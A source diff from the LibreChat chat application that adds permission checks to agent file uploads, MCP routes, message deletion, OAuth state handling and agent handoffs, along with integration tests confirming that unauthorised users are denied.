SystemRoles,
ResourceType, ResourceType,
EModelEndpoint, EModelEndpoint,
PermissionBits, PermissionBits,
@ -381,48 +381,15 @@ router.post('/', async (req, res) => {
return await processFileUpload({ req, res, metadata }); return await processFileUpload({ req, res, metadata });
} }
/** const denied = await verifyAgentUploadPermission({
* Check agent permissions for permanent agent file uploads (not message attachments). req,
* Message attachments (message_file=true) are temporary files for a single conversation res,
* and should be allowed for users who can chat with the agent. metadata,
* Permanent file uploads to tool_resources require EDIT permission. getAgent,
*/ checkPermission,
const isMessageAttachment = metadata.message_file === true || metadata.message_file === 'true'; });
if (metadata.agent_id && metadata.tool_resource && !isMessageAttachment) { if (denied) {
const userId = req.user.id; return;
/** Admin users bypass permission checks */
if (req.user.role !== SystemRoles.ADMIN) {
const agent = await getAgent({ id: metadata.agent_id });
if (!agent) {
return res.status(404).json({
error: 'Not Found',
message: 'Agent not found',
});
}
/** Check if user is the author or has edit permission */
if (agent.author.toString() !== userId) {
const hasEditPermission = await checkPermission({
userId,
role: req.user.role,
resourceType: ResourceType.AGENT,
resourceId: agent._id,
requiredPermission: PermissionBits.EDIT,
});
if (!hasEditPermission) {
logger.warn(
`[/files] User ${userId} denied upload to agent ${metadata.agent_id} (insufficient permissions)`,
);
return res.status(403).json({
error: 'Forbidden',
message: 'Insufficient permissions to upload files to this agent',
});
}
}
}
} }
return await processAgentFileUpload({ req, res, metadata }); return await processAgentFileUpload({ req, res, metadata });

View file

@ -0,0 +1,376 @@
const express = require('express');
const request = require('supertest');
const mongoose = require('mongoose');
const { v4: uuidv4 } = require('uuid');
const { createMethods } = require('@librechat/data-schemas');
const { MongoMemoryServer } = require('mongodb-memory-server');
const {
SystemRoles,
AccessRoleIds,
ResourceType,
PrincipalType,
} = require('librechat-data-provider');
const { createAgent } = require('~/models/Agent');
jest.mock('~/server/services/Files/process', () => ({
processAgentFileUpload: jest.fn().mockImplementation(async ({ res }) => {
return res.status(200).json({ message: 'Agent file uploaded', file_id: 'test-file-id' });
}),
processImageFile: jest.fn().mockImplementation(async ({ res }) => {
return res.status(200).json({ message: 'Image processed' });
}),
filterFile: jest.fn(),
}));
jest.mock('fs', () => {
const actualFs = jest.requireActual('fs');
return {
...actualFs,
promises: {
...actualFs.promises,
unlink: jest.fn().mockResolvedValue(undefined),
},
};
});
const fs = require('fs');
const { processAgentFileUpload } = require('~/server/services/Files/process');
const router = require('~/server/routes/files/images');
describe('POST /images - Agent Upload Permission Check (Integration)', () => {
let mongoServer;
let authorId;
let otherUserId;
let agentCustomId;
let User;
let Agent;
let AclEntry;
let methods;
let modelsToCleanup = [];
beforeAll(async () => {
mongoServer = await MongoMemoryServer.create();
const mongoUri = mongoServer.getUri();
await mongoose.connect(mongoUri);
const { createModels } = require('@librechat/data-schemas');
const models = createModels(mongoose);
modelsToCleanup = Object.keys(models);
Object.assign(mongoose.models, models);
methods = createMethods(mongoose);
User = models.User;
Agent = models.Agent;
AclEntry = models.AclEntry;
await methods.seedDefaultRoles();
});
afterAll(async () => {
const collections = mongoose.connection.collections;
for (const key in collections) {
await collections[key].deleteMany({});
}
for (const modelName of modelsToCleanup) {
if (mongoose.models[modelName]) {
delete mongoose.models[modelName];
}
}
await mongoose.disconnect();
await mongoServer.stop();
});
beforeEach(async () => {
await Agent.deleteMany({});
await User.deleteMany({});
await AclEntry.deleteMany({});
authorId = new mongoose.Types.ObjectId();
otherUserId = new mongoose.Types.ObjectId();
agentCustomId = `agent_${uuidv4().replace(/-/g, '').substring(0, 21)}`;
await User.create({ _id: authorId, username: 'author', email: 'author@test.com' });
await User.create({ _id: otherUserId, username: 'other', email: 'other@test.com' });
jest.clearAllMocks();
});
const createAppWithUser = (userId, userRole = SystemRoles.USER) => {
const app = express();
app.use(express.json());
app.use((req, _res, next) => {
if (req.method === 'POST') {
req.file = {
originalname: 'test.png',
mimetype: 'image/png',
size: 100,
path: '/tmp/t.png',
filename: 'test.png',
};
req.file_id = uuidv4();
}
next();
});
app.use((req, _res, next) => {
req.user = { id: userId.toString(), role: userRole };
req.app = { locals: {} };
req.config = { fileStrategy: 'local', paths: { imageOutput: '/tmp/images' } };
next();
});
app.use('/images', router);
return app;
};
it('should return 403 when user has no permission on agent', async () => {
await createAgent({
id: agentCustomId,
name: 'Test Agent',
provider: 'openai',
model: 'gpt-4',
author: authorId,
});
const app = createAppWithUser(otherUserId);
const response = await request(app).post('/images').send({
endpoint: 'agents',
agent_id: agentCustomId,
tool_resource: 'context',
file_id: uuidv4(),
});
expect(response.status).toBe(403);
expect(response.body.error).toBe('Forbidden');
expect(processAgentFileUpload).not.toHaveBeenCalled();
expect(fs.promises.unlink).toHaveBeenCalledWith('/tmp/t.png');
});
it('should allow upload for agent owner', async () => {
await createAgent({
id: agentCustomId,
name: 'Test Agent',
provider: 'openai',
model: 'gpt-4',
author: authorId,
});
const app = createAppWithUser(authorId);
const response = await request(app).post('/images').send({
endpoint: 'agents',
agent_id: agentCustomId,
tool_resource: 'context',
file_id: uuidv4(),
});
expect(response.status).toBe(200);
expect(processAgentFileUpload).toHaveBeenCalled();
});
it('should allow upload for admin regardless of ownership', async () => {
await createAgent({
id: agentCustomId,
name: 'Test Agent',
provider: 'openai',
model: 'gpt-4',
author: authorId,
});
const app = createAppWithUser(otherUserId, SystemRoles.ADMIN);
const response = await request(app).post('/images').send({
endpoint: 'agents',
agent_id: agentCustomId,
tool_resource: 'context',
file_id: uuidv4(),
});
expect(response.status).toBe(200);
expect(processAgentFileUpload).toHaveBeenCalled();
});
it('should allow upload for user with EDIT permission', async () => {
const agent = await createAgent({
id: agentCustomId,
name: 'Test Agent',
provider: 'openai',
model: 'gpt-4',
author: authorId,
});
const { grantPermission } = require('~/server/services/PermissionService');
await grantPermission({
principalType: PrincipalType.USER,
principalId: otherUserId,
resourceType: ResourceType.AGENT,
resourceId: agent._id,
accessRoleId: AccessRoleIds.AGENT_EDITOR,
grantedBy: authorId,
});
const app = createAppWithUser(otherUserId);
const response = await request(app).post('/images').send({
endpoint: 'agents',
agent_id: agentCustomId,
tool_resource: 'context',
file_id: uuidv4(),
});
expect(response.status).toBe(200);
expect(processAgentFileUpload).toHaveBeenCalled();
});
it('should deny upload for user with only VIEW permission', async () => {
const agent = await createAgent({
id: agentCustomId,
name: 'Test Agent',
provider: 'openai',
model: 'gpt-4',
author: authorId,
});
const { grantPermission } = require('~/server/services/PermissionService');
await grantPermission({
principalType: PrincipalType.USER,
principalId: otherUserId,
resourceType: ResourceType.AGENT,
resourceId: agent._id,
accessRoleId: AccessRoleIds.AGENT_VIEWER,
grantedBy: authorId,
});
const app = createAppWithUser(otherUserId);
const response = await request(app).post('/images').send({
endpoint: 'agents',
agent_id: agentCustomId,
tool_resource: 'context',
file_id: uuidv4(),
});
expect(response.status).toBe(403);
expect(response.body.error).toBe('Forbidden');
expect(processAgentFileUpload).not.toHaveBeenCalled();
expect(fs.promises.unlink).toHaveBeenCalledWith('/tmp/t.png');
});
it('should skip permission check for regular image uploads without agent_id/tool_resource', async () => {
const app = createAppWithUser(otherUserId);
const response = await request(app).post('/images').send({
endpoint: 'agents',
file_id: uuidv4(),
});
expect(response.status).toBe(200);
});
it('should return 404 for non-existent agent', async () => {
const app = createAppWithUser(otherUserId);
const response = await request(app).post('/images').send({
endpoint: 'agents',
agent_id: 'agent_nonexistent123456789',
tool_resource: 'context',
file_id: uuidv4(),
});
expect(response.status).toBe(404);
expect(response.body.error).toBe('Not Found');
expect(processAgentFileUpload).not.toHaveBeenCalled();
expect(fs.promises.unlink).toHaveBeenCalledWith('/tmp/t.png');
});
it('should allow message_file attachment (boolean true) without EDIT permission', async () => {
const agent = await createAgent({
id: agentCustomId,
name: 'Test Agent',
provider: 'openai',
model: 'gpt-4',
author: authorId,
});
const { grantPermission } = require('~/server/services/PermissionService');
await grantPermission({
principalType: PrincipalType.USER,
principalId: otherUserId,
resourceType: ResourceType.AGENT,
resourceId: agent._id,
accessRoleId: AccessRoleIds.AGENT_VIEWER,
grantedBy: authorId,
});
const app = createAppWithUser(otherUserId);
const response = await request(app).post('/images').send({
endpoint: 'agents',
agent_id: agentCustomId,
tool_resource: 'context',
message_file: true,
file_id: uuidv4(),
});
expect(response.status).toBe(200);
expect(processAgentFileUpload).toHaveBeenCalled();
});
it('should allow message_file attachment (string "true") without EDIT permission', async () => {
const agent = await createAgent({
id: agentCustomId,
name: 'Test Agent',
provider: 'openai',
model: 'gpt-4',
author: authorId,
});
const { grantPermission } = require('~/server/services/PermissionService');
await grantPermission({
principalType: PrincipalType.USER,
principalId: otherUserId,
resourceType: ResourceType.AGENT,
resourceId: agent._id,
accessRoleId: AccessRoleIds.AGENT_VIEWER,
grantedBy: authorId,
});
const app = createAppWithUser(otherUserId);
const response = await request(app).post('/images').send({
endpoint: 'agents',
agent_id: agentCustomId,
tool_resource: 'context',
message_file: 'true',
file_id: uuidv4(),
});
expect(response.status).toBe(200);
expect(processAgentFileUpload).toHaveBeenCalled();
});
it('should deny upload when message_file is false (not a message attachment)', async () => {
const agent = await createAgent({
id: agentCustomId,
name: 'Test Agent',
provider: 'openai',
model: 'gpt-4',
author: authorId,
});
const { grantPermission } = require('~/server/services/PermissionService');
await grantPermission({
principalType: PrincipalType.USER,
principalId: otherUserId,
resourceType: ResourceType.AGENT,
resourceId: agent._id,
accessRoleId: AccessRoleIds.AGENT_VIEWER,
grantedBy: authorId,
});
const app = createAppWithUser(otherUserId);
const response = await request(app).post('/images').send({
endpoint: 'agents',
agent_id: agentCustomId,
tool_resource: 'context',
message_file: false,
file_id: uuidv4(),
});
expect(response.status).toBe(403);
expect(response.body.error).toBe('Forbidden');
expect(processAgentFileUpload).not.toHaveBeenCalled();
expect(fs.promises.unlink).toHaveBeenCalledWith('/tmp/t.png');
});
});

View file

@ -2,12 +2,15 @@ const path = require('path');
const fs = require('fs').promises; const fs = require('fs').promises;
const express = require('express'); const express = require('express');
const { logger } = require('@librechat/data-schemas'); const { logger } = require('@librechat/data-schemas');
const { verifyAgentUploadPermission } = require('@librechat/api');
const { isAssistantsEndpoint } = require('librechat-data-provider'); const { isAssistantsEndpoint } = require('librechat-data-provider');
const { const {
processAgentFileUpload, processAgentFileUpload,
processImageFile, processImageFile,
filterFile, filterFile,
} = require('~/server/services/Files/process'); } = require('~/server/services/Files/process');
const { checkPermission } = require('~/server/services/PermissionService');
const { getAgent } = require('~/models/Agent');
const router = express.Router(); const router = express.Router();
@ -22,6 +25,16 @@ router.post('/', async (req, res) => {
metadata.file_id = req.file_id; metadata.file_id = req.file_id;
if (!isAssistantsEndpoint(metadata.endpoint) && metadata.tool_resource != null) { if (!isAssistantsEndpoint(metadata.endpoint) && metadata.tool_resource != null) {
const denied = await verifyAgentUploadPermission({
req,
res,
metadata,
getAgent,
checkPermission,
});
if (denied) {
return;
}
return await processAgentFileUpload({ req, res, metadata }); return await processAgentFileUpload({ req, res, metadata });
} }

View file

@ -13,6 +13,7 @@ const {
MCPOAuthHandler, MCPOAuthHandler,
MCPTokenStorage, MCPTokenStorage,
setOAuthSession, setOAuthSession,
PENDING_STALE_MS,
getUserMCPAuthMap, getUserMCPAuthMap,
validateOAuthCsrf, validateOAuthCsrf,
OAUTH_CSRF_COOKIE, OAUTH_CSRF_COOKIE,
@ -49,6 +50,18 @@ const router = Router();
const OAUTH_CSRF_COOKIE_PATH = '/api/mcp'; const OAUTH_CSRF_COOKIE_PATH = '/api/mcp';
const checkMCPUsePermissions = generateCheckAccess({
permissionType: PermissionTypes.MCP_SERVERS,
permissions: [Permissions.USE],
getRoleByName,
});
const checkMCPCreate = generateCheckAccess({
permissionType: PermissionTypes.MCP_SERVERS,
permissions: [Permissions.USE, Permissions.CREATE],
getRoleByName,
});
/** /**
* Get all MCP tools available to the user * Get all MCP tools available to the user
* Returns only MCP tools, completely decoupled from regular LibreChat tools * Returns only MCP tools, completely decoupled from regular LibreChat tools
@ -91,7 +104,11 @@ router.get('/:serverName/oauth/initiate', requireJwtAuth, setOAuthSession, async
} }
const oauthHeaders = await getOAuthHeaders(serverName, userId); const oauthHeaders = await getOAuthHeaders(serverName, userId);
const { authorizationUrl, flowId: oauthFlowId } = await MCPOAuthHandler.initiateOAuthFlow( const {
authorizationUrl,
flowId: oauthFlowId,
flowMetadata,
} = await MCPOAuthHandler.initiateOAuthFlow(
serverName, serverName,
serverUrl, serverUrl,
userId, userId,
@ -101,6 +118,7 @@ router.get('/:serverName/oauth/initiate', requireJwtAuth, setOAuthSession, async
logger.debug('[MCP OAuth] OAuth flow initiated', { oauthFlowId, authorizationUrl }); logger.debug('[MCP OAuth] OAuth flow initiated', { oauthFlowId, authorizationUrl });
await MCPOAuthHandler.storeStateMapping(flowMetadata.state, oauthFlowId, flowManager);
setOAuthCsrfCookie(res, oauthFlowId, OAUTH_CSRF_COOKIE_PATH); setOAuthCsrfCookie(res, oauthFlowId, OAUTH_CSRF_COOKIE_PATH);
res.redirect(authorizationUrl); res.redirect(authorizationUrl);
} catch (error) { } catch (error) {
@ -143,30 +161,52 @@ router.get('/:serverName/oauth/callback', async (req, res) => {
return res.redirect(`${basePath}/oauth/error?error=missing_state`); return res.redirect(`${basePath}/oauth/error?error=missing_state`);
} }
const flowId = state; const flowsCache = getLogStores(CacheKeys.FLOWS);
logger.debug('[MCP OAuth] Using flow ID from state', { flowId }); const flowManager = getFlowStateManager(flowsCache);
const flowId = await MCPOAuthHandler.resolveStateToFlowId(state, flowManager);
if (!flowId) {
logger.error('[MCP OAuth] Could not resolve state to flow ID', { state });
return res.redirect(`${basePath}/oauth/error?error=invalid_state`);
}
logger.debug('[MCP OAuth] Resolved flow ID from state', { flowId });
const flowParts = flowId.split(':'); const flowParts = flowId.split(':');
if (flowParts.length < 2 || !flowParts[0] || !flowParts[1]) { if (flowParts.length < 2 || !flowParts[0] || !flowParts[1]) {
logger.error('[MCP OAuth] Invalid flow ID format in state', { flowId }); logger.error('[MCP OAuth] Invalid flow ID format', { flowId });
return res.redirect(`${basePath}/oauth/error?error=invalid_state`); return res.redirect(`${basePath}/oauth/error?error=invalid_state`);
} }
const [flowUserId] = flowParts; const [flowUserId] = flowParts;
if (
!validateOAuthCsrf(req, res, flowId, OAUTH_CSRF_COOKIE_PATH) && const hasCsrf = validateOAuthCsrf(req, res, flowId, OAUTH_CSRF_COOKIE_PATH);
!validateOAuthSession(req, flowUserId) const hasSession = !hasCsrf && validateOAuthSession(req, flowUserId);
) { let hasActiveFlow = false;
logger.error('[MCP OAuth] CSRF validation failed: no valid CSRF or session cookie', { if (!hasCsrf && !hasSession) {
flowId, const pendingFlow = await flowManager.getFlowState(flowId, 'mcp_oauth');
hasCsrfCookie: !!req.cookies?.[OAUTH_CSRF_COOKIE], const pendingAge = pendingFlow?.createdAt ? Date.now() - pendingFlow.createdAt : Infinity;
hasSessionCookie: !!req.cookies?.[OAUTH_SESSION_COOKIE], hasActiveFlow = pendingFlow?.status === 'PENDING' && pendingAge < PENDING_STALE_MS;
}); if (hasActiveFlow) {
return res.redirect(`${basePath}/oauth/error?error=csrf_validation_failed`); logger.debug(
'[MCP OAuth] CSRF/session cookies absent, validating via active PENDING flow',
{
flowId,
},
);
}
} }
const flowsCache = getLogStores(CacheKeys.FLOWS); if (!hasCsrf && !hasSession && !hasActiveFlow) {
const flowManager = getFlowStateManager(flowsCache); logger.error(
'[MCP OAuth] CSRF validation failed: no valid CSRF cookie, session cookie, or active flow',
{
flowId,
hasCsrfCookie: !!req.cookies?.[OAUTH_CSRF_COOKIE],
hasSessionCookie: !!req.cookies?.[OAUTH_SESSION_COOKIE],
},
);
return res.redirect(`${basePath}/oauth/error?error=csrf_validation_failed`);
}
logger.debug('[MCP OAuth] Getting flow state for flowId: ' + flowId); logger.debug('[MCP OAuth] Getting flow state for flowId: ' + flowId);
const flowState = await MCPOAuthHandler.getFlowState(flowId, flowManager); const flowState = await MCPOAuthHandler.getFlowState(flowId, flowManager);
@ -281,7 +321,13 @@ router.get('/:serverName/oauth/callback', async (req, res) => {
const toolFlowId = flowState.metadata?.toolFlowId; const toolFlowId = flowState.metadata?.toolFlowId;
if (toolFlowId) { if (toolFlowId) {
logger.debug('[MCP OAuth] Completing tool flow', { toolFlowId }); logger.debug('[MCP OAuth] Completing tool flow', { toolFlowId });
await flowManager.completeFlow(toolFlowId, 'mcp_oauth', tokens); const completed = await flowManager.completeFlow(toolFlowId, 'mcp_oauth', tokens);
if (!completed) {
logger.warn(
'[MCP OAuth] Tool flow state not found during completion — waiter will time out',
{ toolFlowId },
);
}
} }
/** Redirect to success page with flowId and serverName */ /** Redirect to success page with flowId and serverName */
@ -436,69 +482,75 @@ router.post('/oauth/cancel/:serverName', requireJwtAuth, async (req, res) => {
* Reinitialize MCP server * Reinitialize MCP server
* This endpoint allows reinitializing a specific MCP server * This endpoint allows reinitializing a specific MCP server
*/ */
router.post('/:serverName/reinitialize', requireJwtAuth, setOAuthSession, async (req, res) => { router.post(
try { '/:serverName/reinitialize',
const { serverName } = req.params; requireJwtAuth,
const user = createSafeUser(req.user); checkMCPUsePermissions,
setOAuthSession,
async (req, res) => {
try {
const { serverName } = req.params;
const user = createSafeUser(req.user);
if (!user.id) { if (!user.id) {
return res.status(401).json({ error: 'User not authenticated' }); return res.status(401).json({ error: 'User not authenticated' });
} }
logger.info(`[MCP Reinitialize] Reinitializing server: ${serverName}`); logger.info(`[MCP Reinitialize] Reinitializing server: ${serverName}`);
const mcpManager = getMCPManager(); const mcpManager = getMCPManager();
const serverConfig = await getMCPServersRegistry().getServerConfig(serverName, user.id); const serverConfig = await getMCPServersRegistry().getServerConfig(serverName, user.id);
if (!serverConfig) { if (!serverConfig) {
return res.status(404).json({ return res.status(404).json({
error: `MCP server '${serverName}' not found in configuration`, error: `MCP server '${serverName}' not found in configuration`,
});
}
await mcpManager.disconnectUserConnection(user.id, serverName);
logger.info(
`[MCP Reinitialize] Disconnected existing user connection for server: ${serverName}`,
);
/** @type {Record<string, Record<string, string>> | undefined} */
let userMCPAuthMap;
if (serverConfig.customUserVars && typeof serverConfig.customUserVars === 'object') {
userMCPAuthMap = await getUserMCPAuthMap({
userId: user.id,
servers: [serverName],
findPluginAuthsByKeys,
});
}
const result = await reinitMCPServer({
user,
serverName,
userMCPAuthMap,
}); });
}
await mcpManager.disconnectUserConnection(user.id, serverName); if (!result) {
logger.info( return res.status(500).json({ error: 'Failed to reinitialize MCP server for user' });
`[MCP Reinitialize] Disconnected existing user connection for server: ${serverName}`, }
);
/** @type {Record<string, Record<string, string>> | undefined} */ const { success, message, oauthRequired, oauthUrl } = result;
let userMCPAuthMap;
if (serverConfig.customUserVars && typeof serverConfig.customUserVars === 'object') { if (oauthRequired) {
userMCPAuthMap = await getUserMCPAuthMap({ const flowId = MCPOAuthHandler.generateFlowId(user.id, serverName);
userId: user.id, setOAuthCsrfCookie(res, flowId, OAUTH_CSRF_COOKIE_PATH);
servers: [serverName], }
findPluginAuthsByKeys,
res.json({
success,
message,
oauthUrl,
serverName,
oauthRequired,
}); });
} catch (error) {
logger.error('[MCP Reinitialize] Unexpected error', error);
res.status(500).json({ error: 'Internal server error' });
} }
},
const result = await reinitMCPServer({ );
user,
serverName,
userMCPAuthMap,
});
if (!result) {
return res.status(500).json({ error: 'Failed to reinitialize MCP server for user' });
}
const { success, message, oauthRequired, oauthUrl } = result;
if (oauthRequired) {
const flowId = MCPOAuthHandler.generateFlowId(user.id, serverName);
setOAuthCsrfCookie(res, flowId, OAUTH_CSRF_COOKIE_PATH);
}
res.json({
success,
message,
oauthUrl,
serverName,
oauthRequired,
});
} catch (error) {
logger.error('[MCP Reinitialize] Unexpected error', error);
res.status(500).json({ error: 'Internal server error' });
}
});
/** /**
* Get connection status for all MCP servers * Get connection status for all MCP servers
@ -605,7 +657,7 @@ router.get('/connection/status/:serverName', requireJwtAuth, async (req, res) =>
* Check which authentication values exist for a specific MCP server * Check which authentication values exist for a specific MCP server
* This endpoint returns only boolean flags indicating if values are set, not the actual values * This endpoint returns only boolean flags indicating if values are set, not the actual values
*/ */
router.get('/:serverName/auth-values', requireJwtAuth, async (req, res) => { router.get('/:serverName/auth-values', requireJwtAuth, checkMCPUsePermissions, async (req, res) => {
try { try {
const { serverName } = req.params; const { serverName } = req.params;
const user = req.user; const user = req.user;
@ -662,19 +714,6 @@ async function getOAuthHeaders(serverName, userId) {
MCP Server CRUD Routes (User-Managed MCP Servers) MCP Server CRUD Routes (User-Managed MCP Servers)
*/ */
// Permission checkers for MCP server management
const checkMCPUsePermissions = generateCheckAccess({
permissionType: PermissionTypes.MCP_SERVERS,
permissions: [Permissions.USE],
getRoleByName,
});
const checkMCPCreate = generateCheckAccess({
permissionType: PermissionTypes.MCP_SERVERS,
permissions: [Permissions.USE, Permissions.CREATE],
getRoleByName,
});
/** /**
* Get list of accessible MCP servers * Get list of accessible MCP servers
* @route GET /api/mcp/servers * @route GET /api/mcp/servers

View file

@ -404,8 +404,8 @@ router.put('/:conversationId/:messageId/feedback', validateMessageReq, async (re
router.delete('/:conversationId/:messageId', validateMessageReq, async (req, res) => { router.delete('/:conversationId/:messageId', validateMessageReq, async (req, res) => {
try { try {
const { messageId } = req.params; const { conversationId, messageId } = req.params;
await deleteMessages({ messageId }); await deleteMessages({ messageId, conversationId, user: req.user.id });
res.status(204).send(); res.status(204).send();
} catch (error) { } catch (error) {
logger.error('Error deleting message:', error); logger.error('Error deleting message:', error);

View file

@ -1,6 +1,7 @@
const { logger } = require('@librechat/data-schemas'); const { logger } = require('@librechat/data-schemas');
const { initializeAgent, validateAgentModel } = require('@librechat/api'); const { initializeAgent, validateAgentModel } = require('@librechat/api');
const { loadAddedAgent, setGetAgent, ADDED_AGENT_ID } = require('~/models/loadAddedAgent'); const { loadAddedAgent, setGetAgent, ADDED_AGENT_ID } = require('~/models/loadAddedAgent');
const { filterFilesByAgentAccess } = require('~/server/services/Files/permissions');
const { getConvoFiles } = require('~/models/Conversation'); const { getConvoFiles } = require('~/models/Conversation');
const { getAgent } = require('~/models/Agent'); const { getAgent } = require('~/models/Agent');
const db = require('~/models'); const db = require('~/models');
@ -108,6 +109,7 @@ const processAddedConvo = async ({
getUserKeyValues: db.getUserKeyValues, getUserKeyValues: db.getUserKeyValues,
getToolFilesByIds: db.getToolFilesByIds, getToolFilesByIds: db.getToolFilesByIds,
getCodeGeneratedFiles: db.getCodeGeneratedFiles, getCodeGeneratedFiles: db.getCodeGeneratedFiles,
filterFilesByAgentAccess,
}, },
); );

View file

@ -10,6 +10,8 @@ const {
createSequentialChainEdges, createSequentialChainEdges,
} = require('@librechat/api'); } = require('@librechat/api');
const { const {
ResourceType,
PermissionBits,
EModelEndpoint, EModelEndpoint,
isAgentsEndpoint, isAgentsEndpoint,
getResponseSender, getResponseSender,
@ -20,7 +22,9 @@ const {
getDefaultHandlers, getDefaultHandlers,
} = require('~/server/controllers/agents/callbacks'); } = require('~/server/controllers/agents/callbacks');
const { loadAgentTools, loadToolsForExecution } = require('~/server/services/ToolService'); const { loadAgentTools, loadToolsForExecution } = require('~/server/services/ToolService');
const { filterFilesByAgentAccess } = require('~/server/services/Files/permissions');
const { getModelsConfig } = require('~/server/controllers/ModelController'); const { getModelsConfig } = require('~/server/controllers/ModelController');
const { checkPermission } = require('~/server/services/PermissionService');
const AgentClient = require('~/server/controllers/agents/client'); const AgentClient = require('~/server/controllers/agents/client');
const { getConvoFiles } = require('~/models/Conversation'); const { getConvoFiles } = require('~/models/Conversation');
const { processAddedConvo } = require('./addedConvo'); const { processAddedConvo } = require('./addedConvo');
@ -125,6 +129,7 @@ const initializeClient = async ({ req, res, signal, endpointOption }) => {
toolRegistry: ctx.toolRegistry, toolRegistry: ctx.toolRegistry,
userMCPAuthMap: ctx.userMCPAuthMap, userMCPAuthMap: ctx.userMCPAuthMap,
tool_resources: ctx.tool_resources, tool_resources: ctx.tool_resources,
actionsEnabled: ctx.actionsEnabled,
}); });
logger.debug(`[ON_TOOL_EXECUTE] loaded ${result.loadedTools?.length ?? 0} tools`); logger.debug(`[ON_TOOL_EXECUTE] loaded ${result.loadedTools?.length ?? 0} tools`);
@ -200,6 +205,7 @@ const initializeClient = async ({ req, res, signal, endpointOption }) => {
getUserCodeFiles: db.getUserCodeFiles, getUserCodeFiles: db.getUserCodeFiles,
getToolFilesByIds: db.getToolFilesByIds, getToolFilesByIds: db.getToolFilesByIds,
getCodeGeneratedFiles: db.getCodeGeneratedFiles, getCodeGeneratedFiles: db.getCodeGeneratedFiles,
filterFilesByAgentAccess,
}, },
); );
@ -211,6 +217,7 @@ const initializeClient = async ({ req, res, signal, endpointOption }) => {
toolRegistry: primaryConfig.toolRegistry, toolRegistry: primaryConfig.toolRegistry,
userMCPAuthMap: primaryConfig.userMCPAuthMap, userMCPAuthMap: primaryConfig.userMCPAuthMap,
tool_resources: primaryConfig.tool_resources, tool_resources: primaryConfig.tool_resources,
actionsEnabled: primaryConfig.actionsEnabled,
}); });
const agent_ids = primaryConfig.agent_ids; const agent_ids = primaryConfig.agent_ids;
@ -229,6 +236,22 @@ const initializeClient = async ({ req, res, signal, endpointOption }) => {
return null; return null;
} }
const hasAccess = await checkPermission({
userId: req.user.id,
role: req.user.role,
resourceType: ResourceType.AGENT,
resourceId: agent._id,
requiredPermission: PermissionBits.VIEW,
});
if (!hasAccess) {
logger.warn(
`[processAgent] User ${req.user.id} lacks VIEW access to handoff agent ${agentId}, skipping`,
);
skippedAgentIds.add(agentId);
return null;
}
const validationResult = await validateAgentModel({ const validationResult = await validateAgentModel({
req, req,
res, res,
@ -263,6 +286,7 @@ const initializeClient = async ({ req, res, signal, endpointOption }) => {
getUserCodeFiles: db.getUserCodeFiles, getUserCodeFiles: db.getUserCodeFiles,
getToolFilesByIds: db.getToolFilesByIds, getToolFilesByIds: db.getToolFilesByIds,
getCodeGeneratedFiles: db.getCodeGeneratedFiles, getCodeGeneratedFiles: db.getCodeGeneratedFiles,
filterFilesByAgentAccess,
}, },
); );
@ -278,6 +302,7 @@ const initializeClient = async ({ req, res, signal, endpointOption }) => {
toolRegistry: config.toolRegistry, toolRegistry: config.toolRegistry,
userMCPAuthMap: config.userMCPAuthMap, userMCPAuthMap: config.userMCPAuthMap,
tool_resources: config.tool_resources, tool_resources: config.tool_resources,
actionsEnabled: config.actionsEnabled,
}); });
agentConfigs.set(agentId, config); agentConfigs.set(agentId, config);
@ -351,6 +376,19 @@ const initializeClient = async ({ req, res, signal, endpointOption }) => {
userMCPAuthMap = updatedMCPAuthMap; userMCPAuthMap = updatedMCPAuthMap;
} }
for (const [agentId, config] of agentConfigs) {
if (agentToolContexts.has(agentId)) {
continue;
}
agentToolContexts.set(agentId, {
agent: config,
toolRegistry: config.toolRegistry,
userMCPAuthMap: config.userMCPAuthMap,
tool_resources: config.tool_resources,
actionsEnabled: config.actionsEnabled,
});
}
// Ensure edges is an array when we have multiple agents (multi-agent mode) // Ensure edges is an array when we have multiple agents (multi-agent mode)
// MultiAgentGraph.categorizeEdges requires edges to be iterable // MultiAgentGraph.categorizeEdges requires edges to be iterable
if (agentConfigs.size > 0 && !edges) { if (agentConfigs.size > 0 && !edges) {

View file

@ -0,0 +1,201 @@
const mongoose = require('mongoose');
const {
ResourceType,
PermissionBits,
PrincipalType,
PrincipalModel,
} = require('librechat-data-provider');
const { MongoMemoryServer } = require('mongodb-memory-server');
const mockInitializeAgent = jest.fn();
const mockValidateAgentModel = jest.fn();
jest.mock('@librechat/agents', () => ({
...jest.requireActual('@librechat/agents'),
createContentAggregator: jest.fn(() => ({
contentParts: [],
aggregateContent: jest.fn(),
})),
}));
jest.mock('@librechat/api', () => ({
...jest.requireActual('@librechat/api'),
initializeAgent: (...args) => mockInitializeAgent(...args),
validateAgentModel: (...args) => mockValidateAgentModel(...args),
GenerationJobManager: { setCollectedUsage: jest.fn() },
getCustomEndpointConfig: jest.fn(),
createSequentialChainEdges: jest.fn(),
}));
jest.mock('~/server/controllers/agents/callbacks', () => ({
createToolEndCallback: jest.fn(() => jest.fn()),
getDefaultHandlers: jest.fn(() => ({})),
}));
jest.mock('~/server/services/ToolService', () => ({
loadAgentTools: jest.fn(),
loadToolsForExecution: jest.fn(),
}));
jest.mock('~/server/controllers/ModelController', () => ({
getModelsConfig: jest.fn().mockResolvedValue({}),
}));
let agentClientArgs;
jest.mock('~/server/controllers/agents/client', () => {
return jest.fn().mockImplementation((args) => {
agentClientArgs = args;
return {};
});
});
jest.mock('./addedConvo', () => ({
processAddedConvo: jest.fn().mockResolvedValue({ userMCPAuthMap: undefined }),
}));
jest.mock('~/cache', () => ({
logViolation: jest.fn(),
}));
const { initializeClient } = require('./initialize');
const { createAgent } = require('~/models/Agent');
const { User, AclEntry } = require('~/db/models');
const PRIMARY_ID = 'agent_primary';
const TARGET_ID = 'agent_target';
const AUTHORIZED_ID = 'agent_authorized';
describe('initializeClient — processAgent ACL gate', () => {
let mongoServer;
let testUser;
beforeAll(async () => {
mongoServer = await MongoMemoryServer.create();
await mongoose.connect(mongoServer.getUri());
});
afterAll(async () => {
await mongoose.disconnect();
await mongoServer.stop();
});
beforeEach(async () => {
await mongoose.connection.dropDatabase();
jest.clearAllMocks();
agentClientArgs = undefined;
testUser = await User.create({
email: 'test@example.com',
name: 'Test User',
username: 'testuser',
role: 'USER',
});
mockValidateAgentModel.mockResolvedValue({ isValid: true });
});
const makeReq = () => ({
user: { id: testUser._id.toString(), role: 'USER' },
body: { conversationId: 'conv_1', files: [] },
config: { endpoints: {} },
_resumableStreamId: null,
});
const makeEndpointOption = () => ({
agent: Promise.resolve({
id: PRIMARY_ID,
name: 'Primary',
provider: 'openai',
model: 'gpt-4',
tools: [],
}),
model_parameters: { model: 'gpt-4' },
endpoint: 'agents',
});
